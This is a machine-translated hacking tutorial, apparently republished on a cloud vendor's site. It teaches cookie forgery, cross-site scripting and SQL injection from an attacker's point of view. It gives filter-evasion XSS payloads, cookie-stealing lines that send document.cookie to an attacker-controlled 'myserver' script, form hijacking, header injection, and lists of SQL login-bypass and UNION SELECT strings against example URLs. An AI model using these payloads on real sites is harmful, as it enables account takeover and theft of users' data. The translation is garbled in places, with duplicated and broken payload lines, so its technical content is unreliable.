Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X Web SECURITY-XSS & more X
Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Author: cyberphreak
Translation: the soul [S.S.T]
~ Introduction
In this article I will explain all about XSS and more about it. Through this document, I hope to give you an idea of what XSS is, why XSS is used, and how to use XSS. Once you have learned, you will need to exert your creativity, Because most people have patched up simple XSS vulnerabilities. But what they forget to do is patch more holes than one of the XSS strings, and the special security mechanism in PHP is used to defend against XSS instead of their own. And I'm going to explain more than just XSS, but all web security.
Xxxxxxxxxxxxxxxxxxxxx
x Table of Contents X
Xxxxxxxxxxxxxxxxxxxxx
Xxxxxxxxxxxxxxxxxxxx
x Cookie Editing X
X XSS x
x SQL injection X
Xxxxxxxxxxxxxxxxxxxx
~ What is a cookie?
A cookie is a piece of data. Once you browse a site and sign up for an account, a cookie is set up to record your information. Cookies only save the information you log in to make the site detect whether you have logged in before, if not, it will detect the correctness of your username and password, and then log in. For example, in a nightclub, if you buy a ticket, they will give you a card. So you can go in and out without having to buy a ticket every time. Cookies are more complex than you can see. Nightclubs can only remember you all night, but cookies can remember you all your life.
~ Warning & Deception
So now you know what a cookie is ... What do you think of them? In fact, cookie editing (modification) is one of the easiest ways to do it. As long as there is a browser, you can view and edit cookies, and only need some basic JavaScript knowledge. Open your browser and go to a website, login ... Now enter Javascript:alert (Document.cookie). At this point you should be able to see a username and password. However, most sites do not use cookies now, but use sessions. Unfortunately, sessions cannot be modified ( Server can), unlike cookies, once you have modified a cookie you can cheat yourself. Now let's start cheating ... Let's say you see a warning box and see something like this:
Strusername=cnsst;strpassword=cnsst
Now suppose you know that ' bitch ' is an admin, but you don't know the password. Because of the fragile security mechanism you don't need a password: javascript:void (document.cookie= "Strusername=bitch")
Enter now: Javascript:alert (Document.cookie). That's almost very close to the cookie modified ...
~ What is XSS
XSS, or CSS, whatever you prefer to call it, XSS (CSS) represents a cross-site script. Basically, you can inject your script in any way you want to do it. You can also intercept input information, such as username, password, and cookies, through XSS. This will all be discussed, So there's going to be a lot of examples that we should be able to help you develop your creativity on XSS.
~ Why Use XSS
The obvious problem is that through XSS you can execute any type of script on both the client and server side. However, XSS is not limited to executing scripts, but can intercept input. Enter similar: <input name= "name" type= "Name" >
You intercept the input through XSS and send the intercepted information to your site via a secret file. And none of this is what XSS can do. XSS can also intercept cookies.cookies save valuable information, such as user name, password, and so on.
~ Let's get started ...
I assume you know HTML and JavaScript, and PHP knowledge helps, but it's not necessary. Let's start with this PHP script.
xss--Cross-station scripts
<body>
<form action= "" method= "get" >
<!--The Get method I use because it's easier to practice when we use it. -->
Script: <input name= "name" type= "Name" >
<input type= "Submit" value= "Submit" >
</form>
</body>
<?php
$name = $_get[' name '];
Echo ("Hello $name");
?>
OK, we should all know what the above code is for ... This is a very strange script, no one will use it on their own site (at least I haven't seen), but it is really useful for beginners to understand the principle. Look at the information I've entered:
Cnsst
"Hello cnsst!"
The information inside the quotation marks is the output information. Watch, now I type:
<script>alert (Document.cookie) </script>
Then it will pop document.cookie! so it is susceptible to XSS attacks!
Now that we have a bit of an understanding of XSS, let's understand it. First, the script does is get your input and paste it. Um ... Which means we can enter any data. So wait a minute ... Any data ... OK, what language do you want to ask the client and server side separately? Let me tell you, basically the client language is built on your client browser: javascript,html, VBScript, etc. ...
Server-side language on the other side, not based on your client, and built on the server, there are php,asp and so on ...
There are some ways to inject PHP, which I'll explain later. Now, think about how this can help us. Inject JavaScript? for example you are writing a website program, because it is your site, so you can use all the JavaScript (JS) you want to use. So anyone else can, because XSS allows you to let the site run any script you want to run.
Let's look at a slightly more complicated example!
Suppose you have entered the <script>alert (document.cookie) </script>, and Echo is like this:
Scriptalert (Document.cookie)/script
Or it might be:
Scriptalertdocument.cookie/script
Can be seen more difficult to use ... But there are many ways to use XSS, which is just one of them. And one of the worst ways to do it. You see the "<>" is replaced by the null character "".
Let us continue to use:
<<script>>alert (Document.cookie) <</script>>
Your output will pop Document.cookie.
Now look at the more ruthless:
<<script>>alert ((document.cookie)) <<//script>>
They may replace all or just "<>". So if a pair can't be executed, the other pair can. Now, if you see:
Scriptalertdocument.cookie/script
or <<<script>>>alert (document.cookie) <<</script>>>
They may be able to replace 2 pairs to deceive you, or to replace some letters. Try to use your own methods. You enter:
<script>alert (Document.cookie) </script>
Output like this: Srplert (document.cookie) SRP
With careful observation, you will find that nothing is replaced in the Document.cookie. Why? Because they don't know what you want to alert and what you want to do. So they just guess, just stop the "<>" and the script part. How do you get around it? Look at this:
<<sccriiptt>>aalert (Document.cookie) <<//sccriiptt>>
All redundant parts are just replaced! Now let's get some more advanced!
This time they are still using the replacement, but they check the entire string! For example:
<script>alert (Document.cookie) </script>
The output will be:
Scriptalert (document.cookie) script
See this, you say excitedly, "I know what to do!" OK, let's reconstruct it in your own way:
<<script>>alert (Document.cookie) <</script>>
Output: Scriptalert (document.cookie) script. At this point you may continue to add more <> however, they replace any "<>", no matter how many you enter ... Did you see me say "anything"? Use the following example:
Look at it, it doesn't replace "<>", it replaces the Code keyword. So even if you write a code that has no "<>", it will still be replaced, which is why we write this. If the other side uses stricter standards, replace any type of code, even "alert" ! What can we do to improve it? Look at this:
<
C
R
I
T
>
A
L
E
R
T
(
D
O
C
U
M
E
T
.
C
O
O
K
I
E
)
<
/
C
R
I
T
/
>
This should be OK, but if they still replace "<", you can add 2 to "<< >>" (and you can replace document.cookie with any character)
There are more replacements that I can demonstrate, but what I teach you is that you want to play your creative role.
Now let me talk about other XSS methods. We've talked about client XSS before, so now look at server-side XSS.
Let me first explain the difference between them. The client is seen from your browser's interpreted language, such as JavaScript (JS) VBScript (VBS). Server-side XSS is via XSS from the server-side language, such as php,asp. Client view through browser, Server-side view through the server.
We've learned how to construct client XSS, while constructing the server side we must inject the script into the server. To complete this, we need to find a script like any XSS, but this script will save your XSS to the server. Now, suppose you publish an article on a website, Now to do is replace the article with XSS, why should we use JavaScript? Why not PHP? But let me show you something first.
Document.forms (0). Action = "http://myserver/myscript.php
This can be both on the server side and on the client. So your script will copy the information they entered into that form and save it in a *.txt file on our site.
Again, suppose you register an account on the website and you can customize the information ...
Document.images (0). src= "http://myserver/cookie.php" +document.cookie.
Or if you have space to hold a link to a custom content, you can enter:
javascript:location.href= "http://myserver/cookie.php" +document.cookie
This will intercept the cookie of the user accessing our data. This can be used anywhere, not just on the data, it's just an example.
Sometimes a site will echo your useragent and referer ... Now let's try some XSS at the DOS prompt or in the Command line window,
Telnet example.com
get/page/toplacewhere_itechos_your_useragent.php http/1.1
User-agent: <script>alert (document.cookie) </script>
Referer: <script>alert (document.cookie) </script>
~ What is SQL injection
SQL injection, one of the biggest security issues in the site. So what exactly is SQL injection? Now let's dig through the SQL vulnerabilities at different levels. Suppose you have a login page like this:
There is an XSS vulnerability, but don't worry about it, there is no way to guess or crack the password. So, what do we do? SQL injection!
The simplest attack is to enter "'" in the username and password. If there is no protection mechanism, you should get an error message at this point. If you get it, it's very vulnerable. But the error message is worthless unless you know how to use it. So I'll give you a list of the injections you can use, To use when you get a single quote error message.
'='
' OR 1=1--
' OR a=a--
' OR '
These injections have been hard to come by now since people increased their security, but the following list is not noticed by many people on the security list:
' OR ' = '
' OR ' = '
' OR ' = '
' OR ' = '
' OR ' = '
' OR ' = '
' OR ' = '
' OR ' = '
' OR ' = '
~
Now let me explain the union ALL Select Declaration, which will select a table in the database ... What is displayed depends on the column you choose.
UNION all SELECT Username,password from users
This query statement will execute, but ... what if it doesn't work?
UNION all SELECT Username,password from users WHERE username= ' OR ' = '
and password= ' OR ' = '
You may use other characters instead of ' OR ' = ' to inject the existing injection point. But first of all, how do you know the name of the table? In fact, you find an SQL vulnerability that gives you the error message, and the error message contains the table name.
Once you have discovered the vulnerability, you will use a method like ' OR ' = ' to inject it. To get the name of the table. Sometimes you want to query some useful data from a table, but you have to choose all the tables, because you don't know which table of the data you want to query. In the example below, there are 20 tables with different table names, You are trying to query a list of IP:
UNION All SELECT
Ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip from logs
WHERE ip= ' OR ' = '
Now, do you see this? (I'm sure you've seen it)
Http://example.com/index.php?article=34
That will browse for the article ID 34 ... Let's replace 34 with "'":
Http://example.com/index.php?article= '
Now, remember what I said, most people don't realize ' the insecurity that comes with, you can always try different injection methods, here are some examples:
Http://example.com/index.php?article= '
http://example.com/index.php?article= ' = '
Http://example.com/index.php?article= ' OR 1=1--
Http://example.com/index.php?article= ' OR a=a--
http://example.com/index.php?article= ' OR ' = '
http://example.com/index.php?article= ' OR ' = '
http://example.com/index.php?article= ' OR ' = '
http://example.com/index.php?article= ' OR ' = '
http://example.com/index.php?article= ' OR ' = '
http://example.com/index.php?article= ' OR ' = '
http://example.com/index.php?article= ' OR ' ' = '
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.